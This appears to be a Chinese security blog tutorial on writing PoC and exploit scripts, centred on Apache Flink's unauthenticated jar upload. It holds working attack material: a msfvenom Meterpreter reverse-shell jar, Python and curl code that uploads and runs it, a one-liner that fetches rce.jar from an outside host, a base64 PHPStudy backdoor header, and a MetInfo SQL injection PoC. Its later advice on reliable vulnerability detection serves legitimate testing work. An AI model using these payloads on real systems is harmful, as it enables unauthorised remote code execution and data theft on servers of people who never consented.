从Apache Flink 任意文件上传看PoC和EXP的编写

一、漏洞前提

0x01. 存在未授权访问

访问默认的8081端口，直接进到面板界面，如下图

0x02. jar文件可被成功上传并执行

用msfvenom生产用于反弹shell的jar文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f jar > /opt/rce.jar

1 2	msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f jar > /opt/rce.jar

二、编写poc

0x01 判断网页是否能正常访问

result = []
url = "http://" + self.url if "//" not in self.url else self.url 

# 探测首页是否存活
try:
    res = requests.get(url,timeout=8)
except:
    return self.parse_output(result)
# if alive    
if res.status_code== 200 and "Apache Flink Web Dashboard" in res.text:
    ## 进行下一步操作
    ## ...

result = []

url = "http://" + self.url if "//" not in self.url else self.url

# 探测首页是否存活

try:

res = requests.get(url,timeout=8)

except:

return self.parse_output(result)

# if alive

if res.status_code== 200 and "Apache Flink Web Dashboard" in res.text:

## 进行下一步操作

## ...

0x02 是否存在上传点

# 上传jar文件
JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"
files = {'file': open(JAR_PATH, 'rb')}# 读取文件流
exe_URL = ''
try:
    response = requests.post(url=url+"/jars/upload", files=files, timeout=8)# 尝试上传
    exe_URL = self.url + "/jars/" +json.loads(response).split("/")[-1] + "/run"
except:
    # 上传失败，返回空的result
    return self.parse_output(result)

# 上传jar文件

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"

files = {'file': open(JAR_PATH, 'rb')}# 读取文件流

exe_URL = ''

try:

response = requests.post(url=url+"/jars/upload", files=files, timeout=8)# 尝试上传

exe_URL = self.url + "/jars/" +json.loads(response).split("/")[-1] + "/run"

except:

# 上传失败，返回空的result

return self.parse_output(result)

0x03 上传与执行

采用哪种方式上传

requests 上传

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"
files = {'file': open(JAR_PATH, 'rb')}
# 此处为上传单文件；多文件的上传，可参考官方推荐的字典+元组格式
# ref:http://cn.python-requests.org/zh_CN/latest/user/advanced.html#streaming-uploads

try:
    response = requests.post(url=url+"/jars/upload", files=files, timeout=8) #

except:
    return self.parse_output(result)

# deal with response...

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"

files = {'file': open(JAR_PATH, 'rb')}

# 此处为上传单文件；多文件的上传，可参考官方推荐的字典+元组格式

# ref:http://cn.python-requests.org/zh_CN/latest/user/advanced.html#streaming-uploads

try:

response = requests.post(url=url+"/jars/upload", files=files, timeout=8) #

except:

return self.parse_output(result)

# deal with response...

执行

//请求包如下
POST /jars/0d17b7de-3ca0-478a-a65c-212dd8856402_shell.jar/run?entry-class=metasploit.Payload HTTP/1.1
Host: 18.*.*.10:8080
Content-Length: 35
Accept: application/json, text/plain, */*
Origin: http://18.185.5.10:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://18.*.*.10:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"entryClass":"metasploit.Payload"}

//请求包如下

POST /jars/0d17b7de-3ca0-478a-a65c-212dd8856402_shell.jar/run?entry-class=metasploit.Payload HTTP/1.1

Host: 18.*.*.10:8080

Content-Length: 35

Accept: application/json, text/plain, */*

Origin: http://18.185.5.10:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36

Content-Type: application/json;charset=UTF-8

Referer: http://18.*.*.10:8080/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

{"entryClass":"metasploit.Payload"}

成功

失败

We’re sorry, something went wrong. The server responded with:

Internal server error.

1
2

Internal server error.

We’re sorry, something went wrong. The server responded with:

java.util.concurrent.CompletionException: org.apache.flink.util.FlinkException: Could not run the jar.

1
2
3

java.util.concurrent.CompletionException: org.apache.flink.util.FlinkException: Could not run the jar.

三、复盘与反思

自动化脚本一般怎么上传文件

curl上传-调用shell

curl  -F "filename=@rce.jar" "http://134.*.*.210:8081/jars/upload"

//响应
{
  "filename": "/tmp/flink-web-51e3359e-8c64-42aa-bbf5-fa4867dbfc09/flink-web-upload/6f11d210-93f2-4821-8d63-12669ba83fd0_rce.jar",
  "status": "success"
}

curl -F "filename=@rce.jar" "http://134.*.*.210:8081/jars/upload"

//响应

{

"filename": "/tmp/flink-web-51e3359e-8c64-42aa-bbf5-fa4867dbfc09/flink-web-upload/6f11d210-93f2-4821-8d63-12669ba83fd0_rce.jar",

"status": "success"

}

curl -O http://cs.unc1e.cn:8888/rce.jar  > rce_test.jar& curl  -F "filename=@./rce_test.jar" "http://134.*.*.210:8081/jars/upload"

1 2	curl -O http://cs.unc1e.cn:8888/rce.jar > rce_test.jar& curl -F "filename=@./rce_test.jar" "http://134...210:8081/jars/upload"

局限性：无法获取os命令执行的结果

os.popen()

D:\browser_download\sqlmapproject\sqlmap                                        
λ python            
>>> import os
>>> res = os.popen("mkdir SUCCESS")                         
>>> res                               
<open file 'mkdir SUCCESS', mode 'r' at 0x0000000003F4F1E0>                                      
>>>#【任何时候无回显】

D:\browser_download\sqlmapproject\sqlmap

λ python

>>> import os

>>> res = os.popen("mkdir SUCCESS")

>>> res

>>>#【任何时候无回显】

os.system()

λ python
>>> import os
>>> os.system("whoami")
root
0
>>> res=os.system("mkdir SUCCESS")
0
>>> type(res)
<type 'int'>
>>>#【返回状态码，0表示成功】

λ python

>>> import os

>>> os.system("whoami")

root

>>> res=os.system("mkdir SUCCESS")

>>> type(res)

>>>#【返回状态码，0表示成功】

subprocess.Popen()

>>> import subprocess
# 执行命令
>>> p = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# 若需要传入多个参数，空格、重定向、管道符等需要用逗号分开
>>> p.wait()# 等待进程终止，并返回状态码
0
>>> p.stdout.readlines()# 获取结果
['root\n']

>>> import subprocess

# 执行命令

>>> p = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

# 若需要传入多个参数，空格、重定向、管道符等需要用逗号分开

>>> p.wait()# 等待进程终止，并返回状态码

>>> p.stdout.readlines()# 获取结果

['root\n']

pycurl上传

import pycurl

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"
file = open(JAR_PATH,"rb")

c = pycurl.Curl()
c.setopt(c.URL, "http://134.*.*.210:8081/jars/upload")
# 主干部分
c.setopt(c.HTTPPOST, [
    ('fileupload', (
        # upload the contents of this file
        c.FORM_FILE, file,
    )),
])
# 
c.perform()
c.close()
file.close()

# deal with response...

import pycurl

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"

file = open(JAR_PATH,"rb")

c = pycurl.Curl()

c.setopt(c.URL, "http://134.*.*.210:8081/jars/upload")

# 主干部分

c.setopt(c.HTTPPOST, [

('fileupload', (

# upload the contents of this file

c.FORM_FILE, file,

)),

])

c.perform()

c.close()

file.close()

# deal with response...

requests 上传

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"
files = {'file': open(JAR_PATH, 'rb')}
# 此处为上传单文件；多文件的上传，可参考官方推荐的字典+元组格式
# ref:http://cn.python-requests.org/zh_CN/latest/user/advanced.html#streaming-uploads

try:
    response = requests.post(url=url+"/jars/upload", files=files, timeout=8) #

except:
    return self.parse_output(result)

# deal with response...

JAR_PATH = "/home/pocsuite3/pocsuite3/thirdparty/rce.jar"

files = {'file': open(JAR_PATH, 'rb')}

# 此处为上传单文件；多文件的上传，可参考官方推荐的字典+元组格式

# ref:http://cn.python-requests.org/zh_CN/latest/user/advanced.html#streaming-uploads

try:

response = requests.post(url=url+"/jars/upload", files=files, timeout=8) #

except:

return self.parse_output(result)

# deal with response...

四、PoC和EXP编写思路分析

能随机的都随机。
1. updatexml 报错，如果参数是md5(randvalue) 报错页面的md5数据不一定完整，暂时可以使用固定值代替。
不要直接使用如reponse.status == 200这样判断status code验证漏洞，一定存在误报。

RCE-以PHP study后门为例

坏的例子

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Connection: close

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate

测试RCE类漏洞，如PHP代码执行，请不要使用system、shell_exec、phpinfo等函数测试漏洞，容易出现误报和漏报，原因如下：

如果对方本身就是一个phpinfo页面，无法判断是否是成功执行了代码，导致出现误报
如果对方网站运行在一些虚拟主机环境下，如cpanel，则命令执行函数很可能已经被禁用，此时再用system等函数测试漏洞则会出现漏报

好一些的例子

应该怎么做

各种 rce 通常都可以直接使用整数相乘相加或者md5的方法，然后再查找返回结果，这样只有在代码真正被执行的时候才会得到预期的结果。

如果是测试命令执行，目前推荐使用 expr num1 + num2，主要因为星号在 shell 中可能有潜在的转义问题，执行其他的命令可能返回值格式并不方便匹配。
考虑到有些32位系统整数上限可能低于2^^31和数字过短可能误报，目前要求乘法两个数字的取值范围必须在 40,000 和 44,800 之间，加法两个数字必须在 800,000,000 和 1,000,000,000 之间。

文件包含：少用boot.ini, /etc/passwd（操作系统+waf），尽量考虑cms特性，例如 WordPress 应用路径下 ./wp-config.php 文件是应用默认必须的配置文件，而文件中的特殊字符串标识 require_once(ABSPATH . 'wp-settings.php'); 通常是不会去改动它的。

SQL注入

def poc(url):
    '''MetInfo 5.0.4 Sql injection PoC
    '''
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    # 明文，密文
    plain, cipher = randomMD5()

    payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
    for each in iterate_path(url): # 遍历路径
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            if r.status_code == 200 and cipher in r.content:
                # 如果特征匹配，则漏洞存在
                return url

        except Exception:
            pass  
    return False

def poc(url):

'''MetInfo 5.0.4 Sql injection PoC

'''

if '://' not in url:

if ':443' in url:

url = 'https://' + url

else:

url = 'http://' + url

# 明文，密文

plain, cipher = randomMD5()

payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'

for each in iterate_path(url): # 遍历路径

target = each.rstrip('/') + payload

try:

r = requests.get(target, timeout=20)

if r.status_code == 200 and cipher in r.content:

# 如果特征匹配，则漏洞存在

return url

except Exception:

pass

return False

基于时间的盲注

可当网络很慢时，该怎么判断？（网络传输延迟不可忽略时）

延时 = 系统反应延迟（sleep/benchmark） + 网络传输延时

#/sqlmap/lib/core/common.py#L2628
def wasLastResponseDelayed():
    """
    Returns True if the last web request resulted in a time-delay
    """

    # 99.9999999997440% of all non time-based SQL injection affected
    # response times should be inside +-7*stdev([normal response times])
    # Math reference: http://www.answers.com/topic/standard-deviation

    deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, []))#计算偏差
    threadData = getCurrentThreadData() # 获取当前线程数据

    if deviation and not conf.direct and not conf.disableStats:
        ... 警告

        lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation # 判断标准，小于7倍标准差
        retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))

#/sqlmap/lib/core/common.py#L2628

def wasLastResponseDelayed():

"""

Returns True if the last web request resulted in a time-delay

"""

# 99.9999999997440% of all non time-based SQL injection affected

# response times should be inside +-7*stdev([normal response times])

# Math reference: http://www.answers.com/topic/standard-deviation

deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, []))#计算偏差

threadData = getCurrentThreadData() # 获取当前线程数据

if deviation and not conf.direct and not conf.disableStats:

... 警告

lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation # 判断标准，小于7倍标准差

retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))

假如这次响应时间大于平均值+ 7*平均偏差，就认为该请求导致了数据库延时。

五、参考资料

Seebug-漏洞检测的那些事儿

编写高质量poc – XRAY Document

Python：SQLMap源码精读—基于时间的盲注（time-based blind）

写字的心情

PoC+EXP编写指南—以Apache Flink 任意文件上传为例

从Apache Flink 任意文件上传看PoC和EXP的编写

一、漏洞前提

0x01. 存在未授权访问

0x02. jar文件可被成功上传并执行

二、编写poc

0x01 判断网页是否能正常访问

0x02 是否存在上传点

0x03 上传与执行

requests 上传

执行

We’re sorry, something went wrong. The server responded with:

We’re sorry, something went wrong. The server responded with:

三、复盘与反思

curl上传-调用shell

pycurl上传

requests 上传

四、PoC和EXP编写思路分析

RCE-以PHP study后门为例

应该怎么做

SQL注入

基于时间的盲注

五、参考资料